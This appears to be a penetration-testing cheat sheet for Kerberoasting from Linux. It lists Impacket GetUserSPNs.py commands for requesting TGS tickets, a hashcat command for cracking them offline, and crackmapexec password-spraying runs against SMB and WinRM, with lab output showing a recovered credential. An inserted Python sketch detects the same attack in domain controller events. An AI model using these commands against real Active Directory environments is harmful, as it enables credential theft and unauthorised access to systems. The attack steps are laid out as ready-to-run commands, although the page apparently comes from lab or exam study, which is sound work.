๐ŸงLinux - Kerberoasting

Reference

Impacket - GetUserSPNs.py

cd into the cloned Impacket source directory and install it:

sudo python3 -m pip install .

Requesting all TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Requesting a Single TGS Ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Saving the TGS Ticket to an Output File

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

Cracking the Ticket Offline with Hashcat

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt 
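Seen from the domain controller's side, the request phase above leaves a recognisable trace: Security event 4769 (a Kerberos service ticket was requested) with RC4-HMAC encryption (TicketEncryptionType 0x17, the etype 23 that hashcat mode 13100 cracks), repeated once per SPN account when `-request` is used. The following is an added example, not code from the original page or from Impacket; the event field names and all sample accounts, services and hosts are constructed for illustration.

```python
"""Detection sketch for Kerberoasting: group RC4 (0x17) TGS requests by the
requesting account and source host and flag those that asked for many
distinct service accounts, the pattern GetUserSPNs.py -request produces."""
from collections import defaultdict

# Constructed sample events in the shape of 4769 fields (not real telemetry).
SAMPLE_EVENTS = [
    {"account": "forend@INLANEFREIGHT.LOCAL", "service": "sqldev",    "etype": "0x17", "ip": "172.16.5.50"},
    {"account": "forend@INLANEFREIGHT.LOCAL", "service": "backupjob", "etype": "0x17", "ip": "172.16.5.50"},
    {"account": "forend@INLANEFREIGHT.LOCAL", "service": "svc_web",   "etype": "0x17", "ip": "172.16.5.50"},
    {"account": "forend@INLANEFREIGHT.LOCAL", "service": "krbtgt",    "etype": "0x17", "ip": "172.16.5.50"},  # TGT renewal, excluded
    {"account": "WS01$@INLANEFREIGHT.LOCAL",  "service": "DC01$",     "etype": "0x12", "ip": "172.16.5.20"},  # AES, machine account
    {"account": "jdoe@INLANEFREIGHT.LOCAL",   "service": "sqldev",    "etype": "0x12", "ip": "172.16.5.21"},  # AES, normal use
]

RC4_HMAC = "0x17"  # etype 23; what hashcat -m 13100 expects


def is_roastable_request(ev):
    """True for a TGS request worth counting: RC4 ticket for a user service
    account (machine accounts end in '$' and krbtgt is the TGT itself)."""
    svc = ev["service"]
    return (ev["etype"].lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def kerberoast_alerts(events, min_services=3):
    """Return {(account, source_ip): [services]} for every requester that
    pulled RC4 tickets for at least `min_services` distinct service accounts.
    A single-target run (-request-user) stays below the threshold, so pair
    this with per-ticket RC4 alerting where AES is the expected default."""
    seen = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            seen[(ev["account"], ev["ip"])].add(ev["service"])
    return {key: sorted(svcs) for key, svcs in seen.items() if len(svcs) >= min_services}


if __name__ == "__main__":
    for (account, ip), services in kerberoast_alerts(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting from {ip} as {account}: {', '.join(services)}")
```

In the constructed sample only the forend session from 172.16.5.50 trips the threshold; the AES requests and the krbtgt renewal are ignored.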

Testing Authentication against a Domain Controller

SMB

sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!
crackmapexec smb dc01.heist.offsec -u users.txt -p passwords.txt --continue-on-success

Example

┌──(16:14:22 eo㉿offsec)-[~/exam/192.168.89.165/creds]
└─$ crackmapexec smb dc01.heist.offsec -u users.txt -p passwords.txt --continue-on-success
SMB         DC01.heist.offsec 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:heist.offsec) (signing:True) (SMBv1:False)
SMB         DC01.heist.offsec 445    DC01             [+] heist.offsec\enox:california 

winrm

crackmapexec winrm dc01.heist.offsec -u users.txt -p passwords.txt --continue-on-success

Example

┌──(16:16:07 eo㉿offsec)-[~/exam/192.168.89.165/creds]
└─$ crackmapexec winrm dc01.heist.offsec -u users.txt -p passwords.txt
SMB         DC01.heist.offsec 5985   NONE             [*] None (name:dc01.heist.offsec) (domain:None)
HTTP        DC01.heist.offsec 5985   NONE             [*] http://DC01.heist.offsec:5985/wsman
WINRM       DC01.heist.offsec 5985   NONE             [-] None\enox:california "unsupported hash type md4"
WINRM       DC01.heist.offsec 5985   NONE             [-] None\administrator:california "unsupported hash type md4"
WINRM       DC01.heist.offsec 5985   NONE             [-] None\krbtgt:california "unsupported hash type md4"